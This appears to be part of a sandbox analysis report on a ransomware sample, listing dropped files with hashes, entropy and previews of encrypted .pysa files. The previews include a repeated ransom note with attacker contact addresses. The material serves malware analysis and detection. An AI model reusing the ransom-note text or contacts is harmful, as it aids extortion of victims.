                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.669690463239471
                  Encrypted:false
                  SSDEEP:192:wH8OYEbAL/pi/e7I45vPRxshOxMgIfVlVDBNdSSq70oy+U28CqcPbLrb:FibALRiX45n8hOx5ulVvdSSq70XZobj
                  MD5:015A2880B506737714DD8B85BCB7BADF
                  SHA1:12DC508D5368B80940F6331E6F71D1C8AAAF05AC
                  SHA-256:51BA09123B42A11DD328ED96111BCAFA3CE1CFBF46267678C9641B75A9CB774D
                  SHA-512:1667835D97D1ED194DEB1CCEC2B6DCDB7FC88BE178697982F14BD654689E730C1E9D252D8F96DA0C411FEE3DF77A8C5643D3B9F30997A6CEBF0F6F35A1C5AFA0
                  Malicious:false
                  Preview: .A1....j.....vcl..F@3k.X.(8.~u..:>{...O..i...3X0H.R..^.5....+..`..VP'.by....4.....H.Is.i.O.TZxMX;..I.].g...8b,. .Jz..>....t;.OLV.@.2:..(...$JN.{.s=.U.~.' ...@z......6.+......K=..'..(s...!.T..Xmwk...y:.`,T}|).=a..........d..<.....G.).5.%)>........].t\.....\...-.2~@$...Nx.>.../..).!g.......6...a.$..=..`.s..g..%Y.kR.^.Ex...<.-.$..<.)R.k...p..O ..........I>..~n...m......i...s....0....=..EsIn....f.~[..v.X....}..".kI .....Y.WI....{....Xu(.x.}l.A....6...p[.6X~.p.IB.\nZb...S\W...i.Gs.anD......M.....ka.0P.>Q.t.......;{Z..9......X;..J..c.9.N...1..z(.......G....X...~....h..m..2......@.x.[...18$..W.y.3Ty.......l.....E..k.1s..:.e..e-Ha.E.w....~Y..#..1s.3.*yc.r..u.vt0.vo.....03.<@;e.KRK..l.....{W2t.dv....Y;Cg..()..f...L...`;..Lr.!..e.d.Y......0..6...Z..o.n1Zbe5Z@....Y..{...#.>.R(i..?.QC.8.`..<@c'C&.h#.o.].Y..H......'.*pv..HW......j'...4...5...O.T.c.I>..7.hf4p)xe*..R.)nd.....'e.>.{d.Y5:.aT..En..O#.).'.s.I..t..l'.l.&...$6w.....xW8qB.]...Ov.#.M......7
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.676744734289598
                  Encrypted:false
                  SSDEEP:192:kLiZSGxx5cs2wR4BmYuyXu8oG3bsNi7mBAGkzZ93h5+:BZlxWwdY1e8ogSi7mebzbhg
                  MD5:3C5EF2877AFB0CB1781DD5DCF5F3D046
                  SHA1:700F2A1E9EBEED9D6714AC30B990F3AC454D7BF8
                  SHA-256:9B30845D6088534A176E701711D9675E3FCBAD1603BCB129204466BD503F323F
                  SHA-512:D8EDD2BB2F5CE516B1125610E3E6E29CB529B2BC47A6AAA4B60C29140B7F534D6D2163510C38B0AD22C92DA7FF067528574618660209223522D985BE7D33E52D
                  Malicious:false
                  Preview: .3..x..:*.w.rM.4;..g...'.G._{.4.i.+....d..(CU..<...t:......z(.G....Y.......^.,.K.c/t......//..PGW*...:..y}U... .L.8w.sx.....|......t.(..QnmoR.m'.....(.j$..0....$....P.}...>...."..H....X....&,e..h..G .s).e..8.i..O....7+a.2..5X.4G=|z........E_.....tE.....X.v_..t..P+...x..fx.&.y...T.... .J<.X...?..^._iBJ.Oa.;.0"...5.,...6.y. .~S.>9...a..'3.s.....U/<...{...J.....m1....f[.7..O*.d...<.b{.|..>r....C{.r..T}..........A3..(e.....$.l.~..|..&...M...K.3&..N..\Z.e...jht.c.)).K.J9..u..S.Db.3.J..O.5l?ml.';.Gr....!..cJ.....x... M....|Zu.Qd..X...r.M]k..%..P./m.....-..L..Q^.i...Q.o)`&.p@Ct.I.)..cX..8......).|U.U...!*.......|B4.bzUBZ..)+K....%p.EKQ!?Y....tjg...:...ay-...B# .X....m;......q..R.l4O.`....=.)...O\../.....[.H9.OQT.c(...........A..Z.F..q.H..i.2A......H....V.|....=J.....)..b.....#..]>.(<....]ta.|,}d...=.....L.oH..~G|.....X..v....@...S!...V.gs..G,a..W..].......I.w.z..|..1.N....0w...z.....D.Y.d.KB..-.U..i.$T...(..68.".....c.67`w.1HY}.5........|*.....[
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\PeerDistRepub\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
